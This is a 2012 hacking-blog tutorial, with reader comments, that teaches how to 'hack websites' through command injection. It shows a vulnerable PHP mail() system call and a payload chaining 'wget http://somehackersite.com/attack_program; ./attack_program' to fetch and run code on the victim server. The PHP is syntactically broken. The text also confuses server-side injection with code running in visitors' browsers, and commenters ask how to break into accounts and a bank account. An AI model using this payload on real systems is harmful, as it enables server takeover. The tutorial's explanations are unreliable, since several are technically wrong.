Hack websites using Command Injection

Hey friends, previously i have explained how to use SQL injection and XPath Injection to hack websites. Today i will teach you another type of injection technique that if executed properly can give you complete ownership of victim's website, called Command Injection. When user input is used as a part of system command, an hacker may inject system commands into the user input..Ahh..confusing...:P Lets understand in clear and simple words..

What is Command Injection?
Command injection is an attack method in which we alters the dynamically generated content on a Web page by entering shell commands into an input mechanism, such as a form field that lacks effective validation constraints. We can exploit that vulnerability to gain unauthorized access to data or network resources. When users visit an affected Web page, their browsers interpret the code, which may cause malicious commands to execute in the users' computers and across their networks. The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable website. In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).

hack websites using command injection
Command Injection Tutorial for Hackers

This can happen in any programming language but its very common in PERL, PHP and shell based CGI. It is less common in Java, Python and C++ ..:P i haven't tried it yet there :D tried once or twice but not able to do so, that why uncommon..:P.

Lets understand things using examples
Consider the below PHP code:
<?PHP
$email_subject ="Welcome to HackingLoops";

if  ( isset ($_GET {'email'} ) ) {
system( "mail " + $_GET {'email'}) + "-s ' " + $email_subject +
" ' < /tmp/email_body", $return_val);
}
?>
The above code is an example where user sends his or her email address in the email parameter, and that user input is directly placed in the system command. Ahh... loophole...
Now similar to SQL injection or XPath injection, our goal is to inject the shell command into the email parameter but make sure code before and after the email parameter remain syntactically correct otherwise the injection will not execute.
Consider the system( ) call as small jigsaw puzzle game where we arrange different puzzle part to make a single image. All the parts except one part are on its place, now we have to find the middle part to finish the puzzle.. :D simple task in game but little tricky in command injection. So our objective is something shown below:
mail  [missing puzzle part]  -s  'Welcome to HackingLoops'  </tmp/email_body
Note: For the missing puzzle part, we need to ensure that the mail command runs properly and exits properly basically i want to focus on syntax, it should be syntactically correct.

For example mail  --help will runs and exits properly. Now we can add other additional shell commands by separating the commands by a semi colon (;).
We can also comment the missing puzzle part using the shell commenting symbol (#) in front. So we can manipulate the missing puzzle part as below:
--help; wget http://somehackersite.com/attack_program;  ./attack_program #
Now the adding our missing puzzle part to our original existing shell command, the below shell command is created:
mail --help; wget http://somehackersite.com/attack_program; ./attack_program # s 'Welcome to HackingLoops' < /tmp/email_body

This resulting command is equivalent to below command:
mail --help; wget http://somehackersite.com/attack_program; ./attack_program
Now what the above command will do..:P You all guys are just reading things like novice hackers.. Any Guess...:P ok..let me explain..
The above shell command will runs the mail --help and then downloads the attack program from somehackersite.com  and executes it on victim, allowing the hacker to perform the arbitrary commands on the vulnerable website. In most cases provide the complete access to the root directory..:P Now do whatever you want to do..
That's all my friends. I hope that you all have enjoyed the tutorial, if you have any doubts or queries ask me in form of comments.
Copy Cats its last warning from HackingLoops, stop copying our articles, if you copy articles always mention the source. Otherwise get ready for DMCA penalty and negative rating on Google.

8 comments:

  1. will the shell allow the download without adding the site to the list of repositories, also from memory you would need to include a confirmation in the script for the wget to execute.

    Unless I'm missing something like a vulnerability with the help command that was run before the payload was launched.

    And what developer in his right mind would use a system call in a php script when the scripting language has built in functions to handle mail...

    ReplyDelete
  2. @anonymous 1
    Yes shell commands execute automatically unless website developer has blocked them manually.
    There is no need for any confirmation from the memory side as this downloads at client side.

    ReplyDelete
  3. hi!!!! lokesh can u post a tutorial on how to view someones hidden email id on fb?

    ReplyDelete
  4. hii lokesh can u upload ryushare premium account and passward or tell me how to be premium with cookies??

    ReplyDelete
  5. hii lokesh can u give me premium account and passward of ryushare ??
    or tell me how to generate/make cookies to get premium

    ReplyDelete
  6. Seems everyone wants low hanging fruit...Learn how to climb a tree and you can have all the fruit my friends
    thanx
    username:alwaysanewbie

    I'm gonna try this

    ReplyDelete
  7. how can i hack a bank account.?

    ReplyDelete
  8. I want more clarity what should I have basic to understand hacking

    ReplyDelete

Please do not spam.

Copyright © 2012 Learn How to Hack - Best Online Ethical Hacking Website All Right Reserved
Designed by Hackingloops.